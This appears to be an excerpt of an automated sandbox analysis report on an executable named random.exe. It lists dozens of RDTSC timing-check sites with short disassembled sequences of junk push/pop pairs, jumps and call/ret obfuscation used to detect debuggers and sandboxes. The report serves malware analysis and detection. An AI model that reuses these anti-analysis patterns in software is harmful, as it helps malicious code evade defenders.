            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 845A5A second address: 845A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 848072 second address: 848076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 848076 second address: 84807C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B5F7 second address: 80B5FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B5FD second address: 80B602 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B602 second address: 80B60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B60F second address: 80B615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B615 second address: 80B619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B619 second address: 80B640 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6B8D266C36h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6B8D266C47h 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 80B640 second address: 80B651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Ah 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F786 second address: 84F78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F78C second address: 84F79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F6B8CF1119Eh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F79F second address: 84F7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84EC30 second address: 84EC47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83438F second address: 8343A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6B8D266C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6B8D266C36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84ED84 second address: 84EDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6B8CF1119Fh 0x0000000a jmp 00007F6B8CF1119Ch 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F03C second address: 84F040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F040 second address: 84F046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F337 second address: 84F341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6B8D266C36h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F341 second address: 84F345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F345 second address: 84F34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F34D second address: 84F36E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F6B8CF11196h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F6B8CF111A1h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F4A5 second address: 84F4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F4A9 second address: 84F4C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push esi 0x0000000b jbe 00007F6B8CF1119Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F5FC second address: 84F600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84F600 second address: 84F606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 851880 second address: 851887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 851B42 second address: 851B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 851B48 second address: 851B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 851CAA second address: 851CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6B8CF111A4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F6B8CF11198h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85240C second address: 852434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F6B8D266C44h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 852D86 second address: 852D91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 854D8B second address: 854D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 856706 second address: 85671F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF1119Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8171BE second address: 8171DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6B8D266C42h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 859481 second address: 859488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 859488 second address: 8594C1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B8D266C45h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D3B91h] 0x00000011 push 00000000h 0x00000013 add edi, dword ptr [ebp+122D2592h] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c and esi, 38A6964Fh 0x00000022 pop esi 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 pushad 0x00000028 popad 0x00000029 pop ebx 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8594C1 second address: 8594DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6B8CF11196h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 857C09 second address: 857C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8594DD second address: 8594E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A059 second address: 85A05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A05F second address: 85A066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A066 second address: 85A0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6B8D266C44h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F6B8D266C38h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D2C1Bh], eax 0x0000002e push 00000000h 0x00000030 and esi, dword ptr [ebp+122D3A15h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F6B8D266C38h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov esi, dword ptr [ebp+122D3A0Dh] 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A0DB second address: 85A0E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A0E1 second address: 85A10A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F6B8D266C42h 0x00000010 jbe 00007F6B8D266C3Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85AA8D second address: 85AAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a mov esi, edi 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F6B8CF11198h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+12477584h], eax 0x0000002e jnl 00007F6B8CF1119Ch 0x00000034 xchg eax, ebx 0x00000035 push edi 0x00000036 je 00007F6B8CF11198h 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e pop edi 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F6B8CF111A8h 0x00000047 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A7FF second address: 85A81F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6B8D266C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A81F second address: 85A826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85BE65 second address: 85BE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85A826 second address: 85A836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF1119Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 810644 second address: 81064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85E872 second address: 85E8A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F6B8CF111A0h 0x0000000c jmp 00007F6B8CF1119Ah 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6B8CF111A6h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85E8A2 second address: 85E8AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6B8D266C36h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85DC17 second address: 85DC2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85EA09 second address: 85EA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85F86A second address: 85F888 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6B8CF1119Eh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F6B8CF11196h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85EA0D second address: 85EA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 860644 second address: 8606CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF111A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F6B8CF11198h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, 6B625469h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F6B8CF11198h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 jmp 00007F6B8CF1119Fh 0x0000004e push 00000000h 0x00000050 jnl 00007F6B8CF1119Ch 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85F888 second address: 85F891 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85EA11 second address: 85EA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8606CC second address: 8606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6B8D266C36h 0x0000000a popad 0x0000000b jc 00007F6B8D266C38h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8606E6 second address: 8606EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8606EA second address: 8606EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8616C6 second address: 8616CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8616CC second address: 86170B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6B8D266C41h 0x0000000f mov edi, dword ptr [ebp+122D31E7h] 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+12472DCCh] 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D18A1h], ecx 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86170B second address: 861712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86266D second address: 862671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86377B second address: 86377F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86377F second address: 863789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 863789 second address: 863815 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 7429E75Ah 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F6B8CF11198h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D3ACDh] 0x00000031 clc 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F6B8CF11198h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e jnc 00007F6B8CF1119Ch 0x00000054 push eax 0x00000055 pushad 0x00000056 jmp 00007F6B8CF1119Ah 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F6B8CF111A8h 0x00000062 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 863966 second address: 86396A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86396A second address: 86396E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8656D9 second address: 86573E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007F6B8D266C36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jnc 00007F6B8D266C39h 0x00000017 push 00000000h 0x00000019 mov bx, ax 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F6B8D266C38h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 jmp 00007F6B8D266C46h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jnl 00007F6B8D266C36h 0x00000048 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86573E second address: 865748 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B8CF11196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 865748 second address: 86574E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86574E second address: 865752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 866789 second address: 86679B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B8D266C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F6B8D266C36h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 869836 second address: 86983A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 867A12 second address: 867A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86A645 second address: 86A668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B8CF111A5h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8658B9 second address: 8658F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007F6B8D266C36h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F6B8D266C40h 0x00000013 pushad 0x00000014 jmp 00007F6B8D266C46h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 867A18 second address: 867A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8658F0 second address: 865968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov di, cx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr [ebp+122D17F3h], ebx 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e mov dword ptr [ebp+122D2C39h], ebx 0x00000024 mov eax, dword ptr [ebp+122D0E7Dh] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F6B8D266C38h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D1A9Fh], esi 0x0000004a push FFFFFFFFh 0x0000004c call 00007F6B8D266C3Eh 0x00000051 sub dword ptr [ebp+122D2BDDh], edi 0x00000057 pop edi 0x00000058 nop 0x00000059 pushad 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d pop edx 0x0000005e jc 00007F6B8D266C3Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 815620 second address: 815626 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
